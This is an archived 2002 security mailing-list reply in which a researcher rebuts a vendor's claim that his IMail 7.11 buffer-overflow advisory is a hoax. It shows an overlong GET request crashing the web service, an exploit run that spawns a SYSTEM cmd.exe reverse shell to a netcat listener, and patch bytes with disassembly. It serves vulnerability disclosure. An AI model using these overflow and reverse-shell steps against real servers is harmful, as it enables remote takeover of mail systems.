Re: Hoax Exploit (2c79cbe14ac7d0b8472d3f129fa1df55 RETURNS)

From: 2c79cbe14ac7d0b8472d3f129fa1df55 2c79cbe14ac7d0b8472d3f129fa1df55 (x_2c79cbe14ac7d0b8472d3f129fa1df55at_private)
Date: Mon Jul 29 2002 - 12:54:20 PDT

Next message: David Wagner: "Re: VNC authentication weakness"

Previous message: Theo de Raadt: "Re: VNC authentication weakness"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

uh, ok

first of all, I haven't been able to respond to any mail since saturday 
afternoon as some nice person/vendor filed a phony abuse report with the 
intelligent people of yahoo inc., and had my account suspended and banned.. 
if you sent any email since saturday, please resend it here.. I'm sure I'll 
have a week or so to read it before I am ABUSE REPORT H4XED..

first off, maybe the exploit isn't working on your system.. hmm, possible I 
guess?.. the described situation is still quite repeatable so what the hell:

xx@xxx:~$ telnet 192.168.0.2 8383
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 200 Created
Date: Mon, 29 Jul 2002 19:20:41 GMT
Server: Ipswitch-IMail/7.11
Last-Modified: Mon, 29 Jul 2002 19:20:41 GMT
Pragma: no-cache
Cache-Control: no-cache
Expires:
Content-Type: text/html
Content-Length: 5143

[....]


hmm, looks like IMail 7.11 to me? how about you?


xx@xxx:~$ telnet 192.168.0.2 8383
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
GET 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 
HTTP/1.0

Connection closed by foreign host.


uh oh, that isn't supposed to happen!@ let's chex those logs!


20020729 162041 Info - 192.168.0.1   GET / HTTP/1.0.
20020729 162423 Info - 192.168.0.1   GET 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.
20020729 162423 Web Error Problem in ThreadProc - Socket 380 on port 8383 
from 192.168.0.1.


hey, look mom.. a dead thread! looks like an overflow to me, let's use that 
elite exploit I found on bugtraq!@


xx@xxx:~$ ./imailexp 192.168.0.2 8383 192.168.0.1 3333
IMail 7.11 remote exploit (SYSTEM level)
2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55at_private)

ret: 0x10012490 (IMailsec.dll v.2.6.17.28)

connecting...done.
dumping payload...done.

cmd.exe spawned to [192.168.0.1:3333]

xx@xxx:~$ nc -l -p 3333
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

D:\WINNT\system32>


seems to work fine to me.. what the hell is going on at ipswitch? is it time 
to fire someone?

as for the patch being a vulnerability.. the binary was compiled with the 
default switches using Borland C++ 5.5 so that's why it's large.. but it's 
the same damn source, so fuck the binary then.. compile from the source:

char p1[] = {0x00,0x30};
//extend text section to make room for our code

char p2[] = {0xe8,0xa1,0x98,0x04,0x00,0x90};
//on a command request, CALL 4A345E;NOP

char p3[] = 
{0x81,0xbc,0x24,0x58,0x03,0x00,0x00,0x47,0x45,0x54,0x20,0x75,0x08,0xc6,0x84,0x24,0xb2,0x03,0x00,0x00,0x00,0x8d,0x85,0xf0,0xed,0xff,0xff,0xc3};
//disassembly below

.text:004A345E                 cmp     [esp+arg_354], 20544547h
.text:004A3469                 jnz     short loc_4A3473
//is the argument "USER"? no? get out of this shit
.text:004A346B                 mov     [esp+arg_3AE], 0
//yes? limit argument to 90 bytes
.text:004A3473 loc_4A3473:                             ; CODE XREF: 
sub_4A345E+Bj
.text:004A3473                 lea     eax, [ebp-1210h]
//shit we ran over to get here
.text:004A3479                 retn

huh? looks like a backdoor to me..

@!$?@!?$@!?%2@$42144@!$@!%?@!$@!%?@!$,
2c79cbe14ac7d0b8472d3f129fa1df55


>Hello,

>In message 284465 there is an "exploit" of IMail Server from Ipswitch
>listed.

>http://online.securityfocus.com/archive/1/284465

>We have been unable to duplicate the problem and the code attached to >the 
>above message is unknown in nature.  We suspect that the "patch" >released 
>in the message is actually designed to open a vulnerability.  >At this time 
>we are advising our users that this advisory is a hoax >and to not apply 
>the patch.  I would like to request that the message >be removed to prevent 
>further confusion.  Thank you.

>John Korsak
>Product Marketing Manager, IMail Server
>(781) 676-5789



_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx

Next message: David Wagner: "Re: VNC authentication weakness"
Previous message: Theo de Raadt: "Re: VNC authentication weakness"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jul 29 2002 - 14:52:03 PDT